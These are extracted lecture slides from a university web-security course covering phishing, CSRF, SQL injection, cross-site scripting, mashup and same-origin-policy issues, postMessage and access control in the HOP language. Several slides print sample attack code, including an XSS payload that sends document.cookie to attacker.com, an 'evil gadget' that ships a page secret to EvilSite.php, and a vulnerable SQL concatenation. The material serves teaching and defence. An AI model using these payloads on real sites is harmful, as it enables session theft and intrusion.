1. Web Programming and Security Lecture 2 Tamara Rezk

2. Security problems Confidentiality violation Integrity violation Availability violation

3. Attacks, summary Phishing attacks (eg MySpace, 2006)

4. Attacks, summary Phishing attacks (eg MySpace, 2006) Session integrity violation (eg Dansie shopping cart, 2006)

5. Attacks, summary Phishing attacks (eg MySpace, 2006) Session integrity attacks (eg Dansie shopping cart, 2006) Cross site request forgery attacks (eg Gmail, 2007)

6. Prevention Server side: – add a secret that the attacker cannot guess – re-authenticate for critical operations User side: –logging off one site before using others

7. Attacks, summary Phishing attacks (eg MySpace, 2006) Session integrity attacks (eg Dansie shopping cart, 2006) Cross site request forgery attacks (eg Gmail, 2007) Navigation policy based attacks (eg Guninski/Citibank, 1999)

8. Attacks, classification? Phishing attacks (eg MySpace, 2006) Session integrity attacks (eg Dansie shopping cart, 2006) Cross site request forgery attacks (eg Gmail, 2007) Navigation policy based attacks (eg Guninski/Citibank, 1999)

9. Lessons Learned Do not trust the client on: Maintaining integrity of sessions state Running client code Providing valid input

10. Lessons Learned Do not trust the client on: Providing valid input public class Greeting extends HttpServlet{ public void doGet{HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException{ res.setContentType(“text/html”); PrinterWriter out = res.getWriter(); String name = req.getParameter(“name”); out.println(“ \n \n”); out.printl(“Greeting from “+ name + “\n”); out.println(“ \n \n”); } }

11. Lessons Learned Do not trust the client http://host/Greeting?name= …

12. Security in Web Applications Main source of vulnerabilities From Cenzic Web Security Trends Report Q1-Q2-2010 Cross-site scripting Information leakage SQL Injection Multitier nature cause problems 12

13. Code injection Data-tier code injection (SQL) Client-tier code injection (Javascript) Server-tier code injection

14. SQL Injection Query = "SELECT score FROM Student where name = ‘" + input 14

15. SQL Code Injection Attack, Microsoft 2008

16. CardSystems out of business, 2005 (SQL Code injection attack) 263000 numbers stolen! 263000 numbers stolen!

17. s ( i 1, …, i n )  c s server program i 1, …, i n untrusted input (provided by client) c client code: HTML document with Javascript nodes Dynamic Code Generation let’s see a guestbook example

18. Attack to the guestbook alert(“attack!”);

19. Embedding Javascript... //<![CDATA[ alert("Page is loading"); //]]> Please do not click on this text.... External Javascript File Inline Code Event Handler

20. Let’s see some other ways to inject code

21. Code Injection, other example Untrusted client input: window.location = “http://attacker.com?cookie=” + document.cookie; Goal: inject the code to a benign user; Consequence: –Cookie stolen by attacker.com; –Possible sensitive private information;

22. Code Injection & XSS - Example Database Guestbook server Benign user Malicious user Attacker.com Add entry: window.location = “http://attacker.com?cookie=” + document.cookie; Get all entries window.location = “http://attacker.com?cookie= ” + document.cookie; Secret cookies

23. Existing Server-side Prevention Escaping Filtering Vulnerable code Patched code Taint Analysis Taint Analysis String Analysis Instruction Randomization Programmer Attention Required!! Randomized code WebSSARI, Huang et al. [2004] Pixy, Jovanovic et al. [2006] Xie and Aiken [2006] … Mimamide [2005] Balzarotti [2008] Wasermann et al. [2008] … Example: preg_replace ("script", "",input) “ ”  “ ” Release …… 23 Boyd et al. [2004]

24. HTML parser and browser quirks Standard HTML Parser –Obtain target syntax tree –No ill-formed result produced Various way of triggering JS engine(BEEP [Jim et al. 2007] –Event listener: ( :onclick "alert(msg)") –Hyperlink: ( :href "javascript:alert(msg)") –Dynamic code evaluation: eval, document.write Solution: turning off all these features in Hop –Advantage of multitier language NOT identified by syntax difference 24

25. Code Injection Attack vectors

27. Web 2.0 Applications 27 2004: AJAX (Asynchronous Javascript and XML) becomes popular, social sites emerge Technologies: Web Browser, Web Server, HTTP, HTML CGI: Common Gateway Interface AJAX : Javascript, CSS, XML, DOM, XMLHttpRequest request a service partial reloading of the webpage (iframe) XMLHttpRequestXMLHttpRequest object for asynchronous communication

28. Mashups: HousingMaps, 2005

29. Web Mashup Web application (client side): Integrating third-party gadget; Integrator partially sharing information to gadget; Example: Housingmap.com Google Maps GadgetIntegrator’s Housing Data Great way to use your data! 29

30. Le Monde is a mashup

31. Code of Le Monde <iframe src= "http://www.youtube.com/embed/W8WP2 SjsZw4?rel=0" width="520" height="294"frameborder="0">

32. ALL OR NOTHING TRUST MODEL IN THE BROWSER The Same Origin Policy

33. Programming Model – Dilemma Full sharing (JS Env.) Running as integrator Gadget trusted Full isolation (by SOP) Running as gadget Limited sharing –Frame identifier –PostMessage Using tag Using frame Google Maps GadgetIntegrator’s Housing Data Google Maps GadgetIntegrator’s Housing Data X 33

34. The same origin policy (SOP) The tag: what about Javascript behaviour? browser integrator’s code … HEAP global object

35. The tag permits to treat code as code from the same origin The same origin policy (SOP) integrator’s code <script src= http://b.com/gadget.js> browser server a.com server b.com

36. The same origin policy (SOP) The tag: what about Javascript behaviour? browser integrator’s code <script src= http://b.com/gadget.js >

37. The same origin policy (SOP)

38. An evil gadget integrator.html 42 gadget.js secret=document.getElementById("secret").innerHTML; setTimeout('delayer()', 5000) delayer = function(){ window.location="EvilSite.php?secret="+secret; }

39. Important JavaScript detail: o.f is treated as o["f"] Javascript Thanks Shriram Krishnamurthi for this slide

40. lookup = function(o, fd) { if (fd === "XHR") { return "unsafe!"; } else { return o[fd]; } } 40 If fd is not a string, JavaScript invokes the.toString method to convert the value to a string Is this function safe?

41. badObj = {toString: function () { return "XHR"}} lookup(window, badObj)  window[badObj]  window[{toString: …}]  Window[{toS…: …}.toS… ()]  window[(function () …) ()]  window["XHR"] …in fact, lookup is unsafe! 41

42. More eval s: e.g., setTimeout: 42 function f() { alert('hello'); } setTimeout(f, 1000); var s = "alert('hello') "; setTimeout(s, 1000); Any JavaScript string!

43. Let’s try some more code with setTimeout

44. s="alert('Lets talk about Javascript!')"; setTimeout(s, 100)

45. function fac(x) { if (x <= 1) { return 1; } return x*fac(x-1); } r = fac(3); s = "alert("+r+")" setTimeout(s, 100)

46. What happens now? function fac(x) { if (x <= 1) { return 1; } return x*fac(x-1); } r = fac(4); s = "alert("+r+")" setTimeout(s, 100)

47. Anything Else? 47 Wrap DOM nodes and callbacks Don’t hand references to DOM nodes to the wrong functions Avoid other conditionally unsafe calls Be aware of implicit method calls in JavaScript’s semantics Simulate private fields (JavaScript provides none) Disallow arbitrary traversal of the object graph Avoid leaking the global object Make sure all invariants hold over 50+ entry points Thank you Shrirma Krishnamurthi for all the recommendations! Check AdSafety

48. The same origin policy (SOP) The tag: what about Javascript behaviour? browser integrator’s code … HEAP global object

49. Frame Communication

50. Fragment Identifier Messaging Send information by navigating a frame –http://gadget.com/#hello Navigating to fragment doesn’t reload frame –No network traffic, but frame can read its fragment Not a secure channel –Confidentiality –Integrity –Authentication 

51. An attack to the Elysee? \ http://www.elysee.fr/president/accueil.1.html?id=13 27062581707&msg=Sotp%20S.O.P.A%20:)%20%E2 %99%AB%E2%99%AB http://www.elysee.fr/president/accueil.1.html?id=13 27077505069&msg=Anonymous http://www.elysee.fr/president/accueil.1.html?id=13 27077699951&msg=We%20Are%20Legion!

52. An attack to the Elysee? \ http://www.elysee.fr/president/accueil.1.html?id=13 27062581707&msg=Sotp%20S.O.P.A%20:)%20%E2 %99%AB%E2%99%AB http://www.elysee.fr/president/accueil.1.html?id=13 27077505069&msg=Anonymous http://www.elysee.fr/president/accueil.1.html?id=13 27077699951&msg=We%20Are%20Legion! Let’s see a video

53. HTML 5 Cross-origin client side communications Postmessage channel between frames Child policy

54. postMessage New API for inter-frame communication Supported in latest betas of many browsers Not a secure channel –Confidentiality –Integrity –Authentication 

55. Reply Attack

56. Fix: Improve the API (Standford) Let the sending specify the recipient –frame[0].postMessage(“Hello”, “http://gadget.com”) –Can omit argument if confidentiality not required Adoption –Firefox 3 –Internet Explorer 8 –Safari 3.1 see Securing Frame Communication in Browsers

57. Security considerations postmessage Do not configure target origin to “*” Sensitive data can be leaked to unknown widgets Always check for sender’s origin Always validate data before use Do not consume data directly with eval() or innerHTML

58. Basic definitions of security Confidential information is stored in, or communicated through “objects” protected by access rights, typically for reading, writing, and executing. Confidentiality : to prevent unauthorized disclosure of data we should implement: – access control – secure information flow – adequate cryptography – secure protocols (to name a few)

59. Access Control  “ Subjects” = programs (threads) or users, with security clearances (read/write/execute).  “Objects” = where information is stored. For instance memory locations, files, entries in a database, services, communication channels … with access rights.  Access control = the operations performed by the “subjects” over the “objects” are checked to have the appropriate clearance.

60. Access Control (for integrity) A simple example in hop: A Guest Book Application Objects = “services” Subjects = “users calling the services” (authentication) Access Policy = “which user can call which service” ServicesUsers addentryanonymous addentry, delete-all-entriesadmin

61. Access Control (for confidentiality) A simple example in hop: A Broker Application Objects = “services”  showStockInfo Subjects = “users calling the services” (authentication) Access Policy = “No user should learn anything about stocks of other users” (each user can see only his/her confidential information on stocks)

62. Access control In Hop: wizard.hop

63. AUTHENTICATION PROTOCOLS Http authentication is not really secure!! Let’s play attacker again on an example with “Tamper Data” and a Base64 Decoder to obtain the password of the admin user.

64. SSL/TLS AUTHENTICATION

65. INFORMATION FLOW IN THE PROGRAM

66. Broker Application (define (isUser t a) (string=? t (car a))) (define-service (show-all-entry) … (map show-entry (filter (lambda (a) (isUser username a )) broker-private-information))) (define-service (broker) ( ( … ( :onclick ~(with-hop ($show-all-entry) …) "Share holder login“)…)))

67. Broker Application (define (isUser1 t a) (string-contains t (car a))) (define-service (show-all-entry) … (map show-entry (filter (lambda (a) (isUser1 username a )) broker-private-information))) (define-service (broker) ( ( … ( :onclick ~(with-hop ($show-all-entry) …) "Share holder login“)…)))

68. Availability security problems A service or resource is made unvailable

69. Availability security problems A service or resource is made unvailable Common attack: DOS or Distributed DOS (DDOS)

70. Availability security problems A service or resource is made unvailable Common attack: DOS or Distributed DOS (DDOS) How to prevent it?

71. Availability security problems

72. Attacks, summary Phishing attacks (eg MySpace, 2006) Session integrity attacks (eg Dansie shopping cart, 2006) Cross site request forgery attacks (eg Gmail, 2007) Navigation policy based attacks (eg Guninski/Citibank, 1999) Code injection attacks (eg Microsoft, 2008) XSS attacks Mashup based attacks http authentication attacks DOS attacks (Captchas)

73. Context – Multi-tier Language Unified Language Code split to different tiers Example: –LINKS [Cooper et al. 2005] –Swift [Chong et al. 2007] –Ur [Chlipala 2010] –HOP [Serrano et al. 2006] This course focus: HOP 73 Unified source Multi-tier compiler Server code Client code Data query

74. Hop compilation 74 Hop source Server Bytecode Server Bytecode Server Bytecode Server Bytecode Hop client code HTML CSS JS Client code compiler HTTP Invoke Access URLs Server code compiler Generate Code Injection Prevention Code Injection Prevention Mashic Compiler Mashic Compiler URL